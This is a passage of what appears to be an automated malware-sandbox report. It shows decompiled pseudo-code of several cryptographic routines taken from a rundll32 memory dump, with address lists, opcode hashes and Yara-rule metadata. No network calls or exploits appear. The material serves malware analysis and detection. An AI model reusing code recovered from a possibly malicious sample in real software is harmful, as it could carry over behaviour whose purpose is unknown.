				_t140 = (((( *(_t179 + 0xc) & 0x000000ff) << 0x00000008 |  *(_t179 + 0xd) & 0x000000ff) << 0x00000008 |  *(_t179 + 0xe) & 0x000000ff) << 0x00000008 |  *(_t179 + 0xf) & 0x000000ff) + 1;
				 *(_t179 + 0xf) = dil;
				 *(_t179 + 0xc) = _t140 >> 0x18;
				 *(_t179 + 0xd) = _t140 >> 0x10;
				_t124 = _t140 >> 8;
				 *(_t179 + 0xe) = _t124;
				return _t124;
			}







































                                        0x21ef305fb60
                                        0x21ef305fb60
                                        0x21ef305fb65
                                        0x21ef305fb6a
                                        0x21ef305fb75
                                        0x21ef305fb7a
                                        0x21ef305fb85
                                        0x21ef305fb8b
                                        0x21ef305fb8e
                                        0x21ef305fb96
                                        0x21ef305fba1
                                        0x21ef305fbac
                                        0x21ef305fbb2
                                        0x21ef305fbb6
                                        0x21ef305fc09
                                        0x21ef305fc55
                                        0x21ef305fc59
                                        0x21ef305fc5d
                                        0x21ef305fc61
                                        0x21ef305fc66
                                        0x21ef305fc6b
                                        0x21ef305fc70
                                        0x21ef305fc74
                                        0x21ef305fc75
                                        0x21ef305fc7a
                                        0x21ef305fc7b
                                        0x21ef305fc7c
                                        0x21ef305fc7d
                                        0x21ef305fc7e
                                        0x21ef305fc7f
                                        0x21ef305fc8b
                                        0x21ef305fc90
                                        0x21ef305fc93
                                        0x21ef305fc96
                                        0x21ef305fc99
                                        0x21ef305fc9c
                                        0x21ef305fc9f
                                        0x21ef305fca3
                                        0x21ef305fca6
                                        0x21ef305fcaa
                                        0x21ef305fcae
                                        0x21ef305fcb2
                                        0x21ef305fcb6
                                        0x21ef305fcc1
                                        0x21ef305fcc3
                                        0x21ef305fccb
                                        0x21ef305fcd2
                                        0x21ef305fcd5
                                        0x21ef305fcd9
                                        0x21ef305fcde
                                        0x21ef305fce6
                                        0x21ef305fcef
                                        0x21ef305fcf5
                                        0x21ef305fd08
                                        0x21ef305fd0d
                                        0x21ef305fd12
                                        0x21ef305fd15
                                        0x21ef305fd20
                                        0x21ef305fd2b
                                        0x21ef305fd2d
                                        0x21ef305fd30
                                        0x21ef305fd32
                                        0x21ef305fd3a
                                        0x21ef305fd45
                                        0x21ef305fd4f
                                        0x21ef305fd51
                                        0x21ef305fd57
                                        0x21ef305fd60
                                        0x21ef305fd64
                                        0x21ef305fd68
                                        0x21ef305fd6c
                                        0x21ef305fd77
                                        0x21ef305fd7c
                                        0x21ef305fd84
                                        0x21ef305fd9d
                                        0x21ef305fda7
                                        0x21ef305fdba
                                        0x21ef305fdbf
                                        0x21ef305fdd1
                                        0x21ef305fdd5
                                        0x21ef305fdd9
                                        0x21ef305fde2
                                        0x21ef305fde6
                                        0x21ef305fdeb
                                        0x21ef305fdf1
                                        0x21ef305fdf6
                                        0x21ef305fdfa
                                        0x21ef305fe02
                                        0x21ef305fe04
                                        0x21ef305fe07
                                        0x21ef305fe09
                                        0x21ef305fe0c
                                        0x21ef305fe17
                                        0x21ef305fe24
                                        0x21ef305fe2e
                                        0x21ef305fe37
                                        0x21ef305fe44
                                        0x21ef305fe52
                                        0x21ef305fe5c
                                        0x21ef305fe66
                                        0x21ef305fe70
                                        0x21ef305fe7a
                                        0x21ef305fe84
                                        0x21ef305fe8e
                                        0x21ef305fe91
                                        0x21ef305fec8
                                        0x21ef305fece
                                        0x21ef305fed2
                                        0x21ef305fed9
                                        0x21ef305fee1
                                        0x21ef305fee6
                                        0x21ef305fee9
                                        0x21ef305fef5

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ecd3b4498f9f1334892d6fcf3a8a6aa42bfa1d9bdc2855b014501723ff72136
                                        • Instruction ID: f901c6ee80450afbccb9e0c8886e9f7788e72aa3eb497fb73e8acde69025c54b
                                        • Opcode Fuzzy Hash: 2ecd3b4498f9f1334892d6fcf3a8a6aa42bfa1d9bdc2855b014501723ff72136
                                        • Instruction Fuzzy Hash: 49817A72604BC48AD750CFA9B8566AA7BE5F359784F05A126EF9C53B06EB38C1A4C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305F3E0 Relevance: .2, Instructions: 214COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 62%
                                        			E0000021E21EF305F3E0(void* __rax, void* __rcx, signed int* __rdx, long long __rdi, signed char* __r8, void* __r9, long long __r12, long long __r13, long long __r15) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* __r14;
				signed char _t98;
				signed int _t99;
				void* _t126;
				signed char _t131;
				unsigned int _t139;
				unsigned int _t140;
				unsigned int _t141;
				void* _t146;
				void* _t148;
				void* _t149;
				intOrPtr _t150;
				long long _t173;
				void* _t174;
				signed long long _t177;
				unsigned long long _t185;
				signed char* _t193;
				signed long long* _t194;
				signed long long* _t195;
				signed long long* _t196;
				signed int* _t198;
				signed int* _t199;
				signed int* _t200;
				void* _t201;
				void* _t202;
				void* _t213;
				void* _t222;
				signed long long _t223;
				unsigned long long _t226;

				_t211 = __r9;
				_t191 = __rdi;
				E0000021E21EF310C220();
				_t202 = _t201 - __rax;
				 *((long long*)(_t202 + 0x28)) =  *((intOrPtr*)(__rcx + 0x178));
				_t222 = __r9;
				_t193 = __r8;
				 *((long long*)(_t202 + 0x20)) =  *((intOrPtr*)(__rcx + 0x180));
				_t173 =  *((intOrPtr*)(__rcx + 0x38)) + __r9;
				if (_t173 - 0xffffffe0 > 0) goto 0xf305f71e;
				if (_t173 - __r9 < 0) goto 0xf305f71e;
				 *((long long*)(_t202 + 0x88)) = __rdi;
				 *((long long*)(_t202 + 0x40)) = __r15;
				 *((long long*)(__rcx + 0x38)) = _t173;
				if ( *((intOrPtr*)(__rcx + 0x174)) == 0) goto 0xf305f46b;
				_t174 = __rcx + 0x40;
				E0000021E21EF3060130(_t126,  *((intOrPtr*)(__rcx + 0x174)), 0xffffffe0, __rcx, _t174, __rcx + 0x60, __rdi, __r8, _t213, __r9);
				 *((intOrPtr*)(__rcx + 0x174)) = 0;
				r15d =  *(__rcx + 0x170);
				 *(_t202 + 0x80) = r15d;
				if (r15d == 0) goto 0xf305f4e8;
				_t146 = _t222;
				if (_t146 == 0) goto 0xf305f4d2;
				_t223 = _t222 - 1;
				_t98 =  *(_t174 + __rcx + 0x10) & 0x000000ff ^  *__rdx;
				_t198 =  &(__rdx[0]);
				 *_t193 = _t98;
				_t194 =  &(_t193[1]);
				 *(_t174 + __rcx + 0x40) =  *(_t174 + __rcx + 0x40) ^ _t98;
				r15d = r15d + 1;
				r15d = r15d & 0x0000000f;
				 *(_t202 + 0x80) = r15d;
				if (_t146 != 0) goto 0xf305f4a0;
				goto 0xf305f4db;
				if (r15d != 0) goto 0xf305f713;
				_t185 = __rcx + 0x60;
				_t99 = E0000021E21EF3060130(_t126, r15d, 0xffffffe0, __rcx, __rcx + 0x40, _t185, _t191, _t194, _t213, _t223);
				 *((long long*)(_t202 + 0x50)) = __r12;
				 *((long long*)(_t202 + 0x48)) = __r13;
				_t148 = _t223 - 0xc00;
				if (_t148 < 0) goto 0xf305f5d6;
				_t177 = _t185 >> 0xb;
				 *(_t202 + 0x30) = _t177;
				 *((long long*)(_t202 + 0x98)) = _t223 + _t177 * 0xfffff400;
				r12d = 0xc0;
				asm("o16 nop [eax+eax]");
				 *((long long*)( *((intOrPtr*)(_t202 + 0x28))))();
				_t139 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 1;
				 *(__rcx + 0xf) = dil;
				 *(__rcx + 0xc) = _t139 >> 0x18;
				 *(__rcx + 0xd) = _t139 >> 0x10;
				 *(__rcx + 0xe) = _t139 >> 8;
				 *_t194 =  *(__rcx + 0x10) ^  *_t198;
				_t199 =  &(_t198[4]);
				_t194[1] = _t198[2] ^  *(__rcx + 0x18);
				_t195 =  &(_t194[2]);
				if (_t148 != 0) goto 0xf305f550;
				r9d = 0xc00;
				E0000021E21EF305FF60(_t126, _t99 * _t223 >> 0x20, _t148, _t198[2] ^  *(__rcx + 0x18), __rcx, __rcx + 0x40, __rcx + 0x60, _t191, _t195, _t199, _t195 - 0xc00, _t211);
				 *(_t202 + 0x30) =  *(_t202 + 0x30) - 1;
				if (_t148 != 0) goto 0xf305f540;
				_t226 =  *((intOrPtr*)(_t202 + 0x98));
				r15d =  *(_t202 + 0x80);
				 *(_t202 + 0x30) = _t226 & 0xfffffff0;
				if (_t148 == 0) goto 0xf305f68d;
				_t149 = _t226 - 0x10;
				if (_t149 < 0) goto 0xf305f677;
				 *((long long*)(_t202 + 0x98)) = _t226 + (_t226 >> 4) * 0xfffffff0;
				 *((long long*)( *((intOrPtr*)(_t202 + 0x28))))();
				_t140 = _t139 + 1;
				 *(__rcx + 0xf) = dil;
				 *(__rcx + 0xc) = _t140 >> 0x18;
				 *(__rcx + 0xd) = _t140 >> 0x10;
				 *(__rcx + 0xe) = _t140 >> 8;
				 *_t195 =  *(__rcx + 0x10) ^  *_t199;
				_t200 =  &(_t199[4]);
				_t195[1] = _t199[2] ^  *(__rcx + 0x18);
				_t196 =  &(_t195[2]);
				if (_t149 != 0) goto 0xf305f612;
				r15d =  *(_t202 + 0x80);
				E0000021E21EF305FF60(_t126, _t99 * _t223 >> 0x20, _t149,  *(_t202 + 0x30), __rcx, __rcx + 0x40, __rcx + 0x60, _t191, _t196, _t200, _t196 -  *(_t202 + 0x30),  *(_t202 + 0x30));
				_t150 =  *((intOrPtr*)(_t202 + 0x98));
				if (_t150 == 0) goto 0xf305f6ee;
				 *((intOrPtr*)(_t202 + 0x28))();
				_t141 = _t140 + 1;
				 *(__rcx + 0xf) = dil;
				 *(__rcx + 0xc) = _t141 >> 0x18;
				 *(__rcx + 0xd) = _t141 >> 0x10;
				 *(__rcx + 0xe) = _t141 >> 8;
				asm("o16 nop [eax+eax]");
				r15d = r15d + 1;
				_t131 =  *(__rcx + _t200) & 0x000000ff ^  *(__rcx + __rcx + 0x10) & 0x000000ff;
				 *(__rcx + _t196) = _t131;
				 *(__rcx + __rcx + 0x40) =  *(__rcx + __rcx + 0x40) ^ _t131;
				if (_t150 != 0) goto 0xf305f6d0;
				 *(__rcx + 0x170) = r15d;
				return 0;
			}



































                                        0x21ef305f3e0
                                        0x21ef305f3e0
                                        0x21ef305f3eb
                                        0x21ef305f3f0
                                        0x21ef305f3fd
                                        0x21ef305f402
                                        0x21ef305f40c
                                        0x21ef305f416
                                        0x21ef305f41b
                                        0x21ef305f42b
                                        0x21ef305f434
                                        0x21ef305f441
                                        0x21ef305f449
                                        0x21ef305f44e
                                        0x21ef305f452
                                        0x21ef305f458
                                        0x21ef305f45c
                                        0x21ef305f461
                                        0x21ef305f46f
                                        0x21ef305f47f
                                        0x21ef305f49c
                                        0x21ef305f4a0
                                        0x21ef305f4a3
                                        0x21ef305f4a8
                                        0x21ef305f4b0
                                        0x21ef305f4b3
                                        0x21ef305f4b6
                                        0x21ef305f4b8
                                        0x21ef305f4bb
                                        0x21ef305f4bf
                                        0x21ef305f4c2
                                        0x21ef305f4c6
                                        0x21ef305f4ce
                                        0x21ef305f4d0
                                        0x21ef305f4d5
                                        0x21ef305f4db
                                        0x21ef305f4e3
                                        0x21ef305f4e8
                                        0x21ef305f4ed
                                        0x21ef305f4f2
                                        0x21ef305f4f9
                                        0x21ef305f514
                                        0x21ef305f51f
                                        0x21ef305f527
                                        0x21ef305f540
                                        0x21ef305f546
                                        0x21ef305f55a
                                        0x21ef305f55d
                                        0x21ef305f55f
                                        0x21ef305f568
                                        0x21ef305f570
                                        0x21ef305f578
                                        0x21ef305f583
                                        0x21ef305f58a
                                        0x21ef305f592
                                        0x21ef305f596
                                        0x21ef305f59e
                                        0x21ef305f5a7
                                        0x21ef305f5b5
                                        0x21ef305f5ba
                                        0x21ef305f5c0
                                        0x21ef305f5c6
                                        0x21ef305f5ce
                                        0x21ef305f5dd
                                        0x21ef305f5e2
                                        0x21ef305f5e8
                                        0x21ef305f5ec
                                        0x21ef305f605
                                        0x21ef305f61c
                                        0x21ef305f61f
                                        0x21ef305f621
                                        0x21ef305f62a
                                        0x21ef305f632
                                        0x21ef305f63a
                                        0x21ef305f645
                                        0x21ef305f64c
                                        0x21ef305f654
                                        0x21ef305f658
                                        0x21ef305f660
                                        0x21ef305f66a
                                        0x21ef305f688
                                        0x21ef305f692
                                        0x21ef305f695
                                        0x21ef305f6a3
                                        0x21ef305f6a7
                                        0x21ef305f6ab
                                        0x21ef305f6b2
                                        0x21ef305f6ba
                                        0x21ef305f6c2
                                        0x21ef305f6c5
                                        0x21ef305f6d3
                                        0x21ef305f6df
                                        0x21ef305f6e1
                                        0x21ef305f6e4
                                        0x21ef305f6ec
                                        0x21ef305f6f5
                                        0x21ef305f712

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9682f4c572a294b176498c2a7ac4af723b75de05574b72cb71e1bd23acf90c10
                                        • Instruction ID: 5479ba9f1a219e09c6bd146ef2f7ae344f6f487cbf340abcdf905dabdd4c6e48
                                        • Opcode Fuzzy Hash: 9682f4c572a294b176498c2a7ac4af723b75de05574b72cb71e1bd23acf90c10
                                        • Instruction Fuzzy Hash: C491C173215BC4C6DB508F39A84039A7BA0F795B98F498216DE8D8BB9ADE3CC546C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3070860 Relevance: .2, Instructions: 194COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E0000021E21EF3070860(void* __esi, void* __rax, long long __rbx, void* __rcx, signed char* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, void* _a40, void* _a48, void* _a56) {
				void* __rdi;
				void* _t65;
				unsigned int _t66;
				signed int _t67;
				signed int _t68;
				void* _t90;
				void* _t97;
				void* _t98;
				long long* _t118;
				void* _t119;
				signed int* _t137;
				void* _t141;
				unsigned long long _t145;
				unsigned long long _t146;
				void* _t161;
				signed int* _t163;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				E0000021E21EF310C220();
				_t66 =  *(__rcx + 0x80);
				r12d = r8d;
				 *((intOrPtr*)(__rcx + 0x88)) =  *((intOrPtr*)(__rcx + 0x88)) + __r8;
				r12d =  ~r12d;
				r14d = _t66;
				r12d = r12d & 0x00000007;
				r14d = r14d & 0x00000007;
				_t141 = __rcx;
				_t98 =  *((intOrPtr*)(__rcx + 0x88)) - __r8;
				if (_t98 >= 0) goto 0xf30708d3;
				_t118 = __rcx + 0x90;
				 *_t118 =  *_t118 + 1;
				if (_t98 != 0) goto 0xf30708d3;
				_t119 = _t118 + 8;
				if (__rcx + 1 - 4 < 0) goto 0xf30708c0;
				if (r12d != 0) goto 0xf30708e1;
				if (r14d == 0) goto 0xf3070a49;
				r13d = 8;
				r13d = r13d - r12d;
				asm("o16 nop [eax+eax]");
				if (__r8 == 0) goto 0xf3070af6;
				r8d = _t66;
				r8d = r8d >> 3;
				if (r14d == r12d) goto 0xf3070a01;
				if (__r8 - 8 < 0) goto 0xf3070996;
				bpl = bpl >> (r13b & 0xffffffff);
				bpl = bpl | ( *__rdx & 0x000000ff) << r12d;
				if (r14d == 0) goto 0xf3070941;
				 *(__r8 + __rcx + 0x40) =  *(__r8 + __rcx + 0x40) | (bpl & 0xffffffff) >> (r14b & 0xffffffff);
				goto 0xf3070946;
				 *(__r8 + __rcx + 0x40) = bpl;
				_t67 = _t66 + 8;
				_t163 =  &(__rdx[1]);
				r8d = r8d + 1;
				if (_t67 - 0x200 < 0) goto 0xf3070976;
				r8d = 1;
				E0000021E21EF3098950(_t67, r14b & 0xffffffff, _t90, _t119, __rcx, __rcx + 0x40, __r8);
				r8d = 0;
				_t68 = _t67 & 0x000001ff;
				if (r14d == 0) goto 0xf30709f6;
				bpl = bpl << 8 - r14d;
				 *(__r8 + __rcx + 0x40) = bpl;
				 *(__rcx + 0x80) = _t68;
				goto 0xf30708f0;
				bpl = bpl << r12d;
				if (r14d == 0) goto 0xf30709b6;
				 *(__r8 + __rcx + 0x40) =  *(__r8 + __rcx + 0x40) | (bpl & 0xffffffff) >> (r14b & 0xffffffff);
				goto 0xf30709bb;
				 *(__r8 + __rcx + 0x40) = bpl;
				r8d = r8d + 1;
				if (_t68 + __esi != 0x200) goto 0xf30709df;
				r8d = 1;
				E0000021E21EF3098950(_t68 + __esi, r14b & 0xffffffff, _t90, _t119, __rcx, __rcx + 0x40, __r8);
				r8d = 0;
				if (r14d == 0) goto 0xf30709f4;
				bpl = bpl << 8 - r14d;
				 *(__r8 + __rcx + 0x40) = bpl;
				 *(__rcx + 0x80) = 0;
				goto 0xf30708f0;
				r14d = 0;
				r12d = 0;
				 *(__r8 + __rcx + 0x40) =  *(__r8 + __rcx + 0x40) | 0x000000ff >> r12d &  *_t163;
				_t145 = __r8 - 8 - _t119;
				if (0 + r13d != 0x200) goto 0xf3070a3e;
				_t34 = _t161 + 1; // 0x1
				r8d = _t34;
				E0000021E21EF3098950(0 + r13d, r12d, _t90, _t119, __rcx, __rcx + 0x40, __r8);
				 *(__rcx + 0x80) = 0;
				goto 0xf30708d3;
				if (_t145 == 0) goto 0xf3070af6;
				if (0 != 0) goto 0xf3070a83;
				_t150 = _t145 >> 9;
				if (_t145 >> 9 == 0) goto 0xf3070a83;
				_t137 =  &(_t163[0]);
				E0000021E21EF3098950(0, r12d, _t90, _t119, __rcx, _t137, _t145 >> 9);
				goto 0xf3070aed;
				if (_t145 - _t137 < 0) goto 0xf3070acb;
				_t146 = _t145 - _t137;
				r8d = 0x200 >> 3;
				E0000021E21EF310DC90(0 >> 3, _t90, 0, _t97, __rcx + 0x40 + _t119,  &(_t163[0]) + (_t145 >> 9 << 9 >> 3), __rcx, _t146, _t150);
				r8d = 1;
				E0000021E21EF3098950(0x200 >> 3, 0 >> 3, _t90, _t119, _t141, _t141 + 0x40, _t150);
				goto 0xf3070ae7;
				_t65 = E0000021E21EF310DC90(0 >> 3, _t90, 0, _t97, _t141 + 0x40 + _t119,  &(_t163[0]) + (_t145 >> 9 << 9 >> 3) + __rbx, _t141, _t146, _t146 >> 3);
				 *((intOrPtr*)(_t141 + 0x80)) = 0;
				if (_t146 != 0) goto 0xf3070a52;
				return _t65;
			}



















                                        0x21ef3070860
                                        0x21ef3070865
                                        0x21ef307086a
                                        0x21ef307087d
                                        0x21ef3070885
                                        0x21ef307088b
                                        0x21ef307088e
                                        0x21ef3070895
                                        0x21ef3070898
                                        0x21ef307089b
                                        0x21ef307089f
                                        0x21ef30708a9
                                        0x21ef30708ac
                                        0x21ef30708b3
                                        0x21ef30708b8
                                        0x21ef30708c0
                                        0x21ef30708c4
                                        0x21ef30708c9
                                        0x21ef30708d1
                                        0x21ef30708d6
                                        0x21ef30708db
                                        0x21ef30708e1
                                        0x21ef30708e7
                                        0x21ef30708ea
                                        0x21ef30708f3
                                        0x21ef30708f9
                                        0x21ef30708fc
                                        0x21ef3070903
                                        0x21ef307090d
                                        0x21ef3070920
                                        0x21ef3070928
                                        0x21ef307092e
                                        0x21ef307093a
                                        0x21ef307093f
                                        0x21ef3070941
                                        0x21ef3070946
                                        0x21ef307094d
                                        0x21ef3070950
                                        0x21ef3070959
                                        0x21ef307095f
                                        0x21ef3070968
                                        0x21ef307096d
                                        0x21ef3070970
                                        0x21ef3070979
                                        0x21ef3070983
                                        0x21ef3070986
                                        0x21ef307098b
                                        0x21ef3070991
                                        0x21ef307099d
                                        0x21ef30709a3
                                        0x21ef30709af
                                        0x21ef30709b4
                                        0x21ef30709b6
                                        0x21ef30709bd
                                        0x21ef30709c6
                                        0x21ef30709cc
                                        0x21ef30709d5
                                        0x21ef30709da
                                        0x21ef30709e2
                                        0x21ef30709ec
                                        0x21ef30709ef
                                        0x21ef30709f6
                                        0x21ef30709fc
                                        0x21ef3070a12
                                        0x21ef3070a18
                                        0x21ef3070a1b
                                        0x21ef3070a25
                                        0x21ef3070a2e
                                        0x21ef3070a30
                                        0x21ef3070a30
                                        0x21ef3070a37
                                        0x21ef3070a3e
                                        0x21ef3070a44
                                        0x21ef3070a4c
                                        0x21ef3070a54
                                        0x21ef3070a59
                                        0x21ef3070a60
                                        0x21ef3070a65
                                        0x21ef3070a6b
                                        0x21ef3070a81
                                        0x21ef3070a94
                                        0x21ef3070a99
                                        0x21ef3070aa3
                                        0x21ef3070aad
                                        0x21ef3070ab6
                                        0x21ef3070ac2
                                        0x21ef3070ac9
                                        0x21ef3070ade
                                        0x21ef3070ae7
                                        0x21ef3070af0
                                        0x21ef3070b12

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f30a663fca60c0f7f0efcddc5908774804e036e471fe29fb02afc69fccd61e0
                                        • Instruction ID: 78ae2f258fe3e8fbee80199154a9b082bd3a72e0a9a9f106b452f96a189a1804
                                        • Opcode Fuzzy Hash: 9f30a663fca60c0f7f0efcddc5908774804e036e471fe29fb02afc69fccd61e0
                                        • Instruction Fuzzy Hash: E5613673B0429257FB598E25D9993FB2A51B321780F56422ADE4693F81EB7CD41BC304
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3091D80 Relevance: .2, Instructions: 190COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF3091D80(long long __rbx, void* __rdx, long long __rdi, void* __r9, long long _a24, long long _a32) {

				_a24 = __rbx;
				_a32 = __rdi;
				r11d = 0;
				if (r8d > 0) goto 0xf3091dac;
				return 0;
			}



                                        0x21ef3091d80
                                        0x21ef3091d85
                                        0x21ef3091d8c
                                        0x21ef3091d9b
                                        0x21ef3091dab

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dad690594b154f1faaf3b1391d93cf52207da30e9cc3dd7bef8987893e5adf10
                                        • Instruction ID: 17eefa9fc3ffbf39d6907bfebe2ad6666feeda647a0f384624aeae16983eb033
                                        • Opcode Fuzzy Hash: dad690594b154f1faaf3b1391d93cf52207da30e9cc3dd7bef8987893e5adf10
                                        • Instruction Fuzzy Hash: 7561D5B6701BD4D6CB14CF8AE444AC8A7A6E3A8FC4B9A9117DF0C57751DB39C686C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305EA40 Relevance: .2, Instructions: 188COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb2d6b7479817ecec3bc0374944a3f4d3649efb8e63c587f62d997ac9df90efa
                                        • Instruction ID: 5bb92d1f99c87cd7cfc3eb2ff78b289c15352509ca5e41e8115bb7bf0b71f7bd
                                        • Opcode Fuzzy Hash: eb2d6b7479817ecec3bc0374944a3f4d3649efb8e63c587f62d997ac9df90efa
                                        • Instruction Fuzzy Hash: A651F9727146D489EF514F26A9883AABF51F366FD4F1A4226DECE07B95D938C047C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305F730 Relevance: .2, Instructions: 185COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 33%
                                        			E0000021E21EF305F730(void* __edi, void* __rax, long long __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __rbp, signed char* __r8, void* __r9, long long __r13, long long _a16, long long _a32, long long _a40, long long _a48, signed int _a96, long long _a104, void* _a120, long long* _a128) {
				long long _v0;
				void* __rbx;
				void* __r14;
				signed char _t79;
				signed int _t80;
				void* _t107;
				signed char _t112;
				signed int _t114;
				signed int _t116;
				unsigned int _t126;
				unsigned int _t127;
				unsigned int _t128;
				void* _t133;
				void* _t135;
				void* _t136;
				long long _t146;
				void* _t147;
				unsigned long long _t156;
				long long _t162;
				void* _t185;
				unsigned long long _t194;
				void* _t196;
				signed long long _t197;
				signed long long _t200;
				signed char* _t203;
				signed char* _t204;
				signed char* _t205;

				_t171 = __rbp;
				_t169 = __rsi;
				_t162 = __rdi;
				E0000021E21EF310C220();
				_t196 = __r9;
				_a16 =  *((intOrPtr*)(__rcx + 0x180));
				_t146 =  *((intOrPtr*)(__rcx + 0x38)) + __r9;
				_t203 = __r8;
				if (_t146 - 0xffffffe0 > 0) goto 0xf305f9de;
				if (_t146 - __r9 < 0) goto 0xf305f9de;
				_a104 = __rbp;
				_a48 = __rsi;
				 *((long long*)(__rcx + 0x38)) = _t146;
				if ( *((intOrPtr*)(__rcx + 0x174)) == 0) goto 0xf305f7b1;
				_t147 = __rcx + 0x40;
				E0000021E21EF3060130(_t107,  *((intOrPtr*)(__rcx + 0x174)), 0xffffffe0, __rcx, _t147, __rcx + 0x60, __rdi, __rsi, _t185, __r9);
				 *((intOrPtr*)(__rcx + 0x174)) = 0;
				_t114 =  *((intOrPtr*)(__rcx + 0x170));
				_a96 = _t114;
				if (_t114 == 0) goto 0xf305f826;
				_t133 = _t196;
				if (_t133 == 0) goto 0xf305f811;
				_t197 = _t196 - 1;
				_t79 =  *(_t147 + __rcx + 0x10) & 0x000000ff ^  *__rdx;
				 *_t203 = _t79;
				_t204 =  &(_t203[1]);
				 *(_t147 + __rcx + 0x40) =  *(_t147 + __rcx + 0x40) ^ _t79;
				_t116 = _t114 + 0x00000001 & 0x0000000f;
				_a96 = _t116;
				if (_t133 != 0) goto 0xf305f7e1;
				goto 0xf305f819;
				if (_t116 != 0) goto 0xf305f9d4;
				_t156 = __rcx + 0x60;
				_t80 = E0000021E21EF3060130(_t107, _t116, 0xffffffe0, __rcx, __rcx + 0x40, _t156, _t162, _t169, _t185, _t197);
				_a40 = _t162;
				_a32 = __r13;
				_t135 = _t197 - 0xc00;
				if (_t135 < 0) goto 0xf305f8ea;
				_t164 = _t156 >> 0xb;
				_a120 = _t197 + (_t156 >> 0xb) * 0xfffff400;
				_v0 = __rcx;
				r8d = 0xc0;
				 *_a128();
				_t126 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 0xc0;
				 *(__rcx + 0xf) = bpl;
				 *(__rcx + 0xc) = _t126 >> 0x18;
				r9d = 0xc00;
				 *(__rcx + 0xd) = _t126 >> 0x10;
				 *(__rcx + 0xe) = _t126 >> 8;
				E0000021E21EF305FF60(_t107, _t80 * _t197 >> 0x20, _t135, (_t156 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t164, _t169, __rbp, _t204, _a16);
				_t205 =  &(_t204[0xc00]);
				if (_t135 != 0) goto 0xf305f870;
				_t200 = _a120;
				_t194 = _t200 & 0xfffffff0;
				if (_t135 == 0) goto 0xf305f94a;
				_v0 = __rcx;
				 *_a128();
				_t127 = _t126 + __edi;
				 *(__rcx + 0xf) = bpl;
				 *(__rcx + 0xc) = _t127 >> 0x18;
				 *(__rcx + 0xd) = _t127 >> 0x10;
				 *(__rcx + 0xe) = _t127 >> 8;
				E0000021E21EF305FF60(_t107, _t80 * _t197 >> 0x20, _t135, (_t156 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t194 >> 4, _t169, _t171, _t205, _t194);
				_t136 = _t200 - _t194;
				if (_t136 == 0) goto 0xf305f9ae;
				 *((intOrPtr*)(__rcx + 0x178))();
				_t128 = _t127 + 1;
				 *(__rcx + 0xf) = bpl;
				 *(__rcx + 0xc) = _t128 >> 0x18;
				 *(__rcx + 0xd) = _t128 >> 0x10;
				 *(__rcx + 0xe) = _t128 >> 8;
				_t112 =  *(__rcx +  &(__rdx[0x300]) + _t194) & 0x000000ff ^  *(__rcx + __rcx + 0x10) & 0x000000ff;
				 *(__rcx +  &(_t205[_t194])) = _t112;
				 *(__rcx + __rcx + 0x40) =  *(__rcx + __rcx + 0x40) ^ _t112;
				if (_t136 != 0) goto 0xf305f990;
				 *((intOrPtr*)(__rcx + 0x170)) = _a96 + 1;
				return 0;
			}






























                                        0x21ef305f730
                                        0x21ef305f730
                                        0x21ef305f730
